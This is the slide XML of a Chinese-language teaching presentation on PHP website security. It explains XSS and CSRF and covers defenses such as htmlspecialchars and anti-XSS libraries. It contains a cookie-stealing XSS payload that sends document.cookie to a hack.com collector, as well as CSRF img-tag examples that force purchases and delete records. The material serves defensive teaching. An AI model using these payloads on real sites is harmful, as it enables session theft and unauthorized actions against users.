          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是要编码的字符串 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[ENT_COMPAT|ENT_QUOTES|ENT_NOQUOTES]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要转换的内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示使用的字符集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>($row['content'],ENT_QUOTES)</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站脚本主要被攻击者利用来读取网站用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或者其他个人数据，一旦攻击者得到这些数据，那么他就可以伪装成此用户来登录网站，获得此用户的权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当有存在跨站漏洞的程序出现的时候，攻击者可以构造类似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://www.aaa.com/search.php?key=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，诱骗用户点击后，可以获取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开篇</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全历来是网络编程重要的组成部分，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作为一门服务器端脚本语言，直接与服务器有密切的联系。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点日益增长的今天，有关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的漏洞也越来越受到开发者的重视。今天我们将从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网站攻击与安全防范方面进行一些探究，旨在减少网站漏洞，希望对大家以后的开发工作有所帮助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pP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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站脚本攻击的步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3" descr="20120416124440517.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="585360" y="1628775"/>
            <a:ext cx="10516028" cy="4943475"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击数据的过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在网站在使用之前必须被正确过滤的主要数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>引用对象，从表单中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的参数，表单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.urlunencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据，标题数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤方法：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数来将特殊字符转换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防止 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击开源库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss_clean.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML Purifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Xssprotect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS HTML Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pP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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>垮网站伪造请求攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF(Cross Site Request Forgeries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，意为跨网站请求伪造，也有写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。攻击者伪造目标用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求，然后此请求发送到有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的网站，网站执行此请求后，引发跨站请求伪造攻击。攻击者利用隐蔽的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>连接，让目标用户在不注意的情况下单击这个链接，由于是用户自己点击的，而他又是合法用户拥有合法权限，所以目标用户能够在网站内执行特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>链接，从而达到攻击者的目的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨网站伪造请求案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>某个购物网站购买商品时，采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://www.shop.com/buy.php?item=watch&amp;num=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数确定要购买什么物品</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数确定要购买数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果攻击者以隐藏的方式发送给目标用户链接</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="http://www.shop.com/buy.php?item=watch&amp;num=1000"/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，那么如果目标用户不小心访问以后，购买的数量就成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨网站伪造请求案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>删除数据操作（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>权限）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/manage/delbook.php?id=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击者在留言中插入隐藏的图片链接，此链接具有删除留言的作用。攻击者在访问时没有任何效果，但是管理员访问时数据就会被删除。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>delbook.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=2" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>delbook.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=3" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
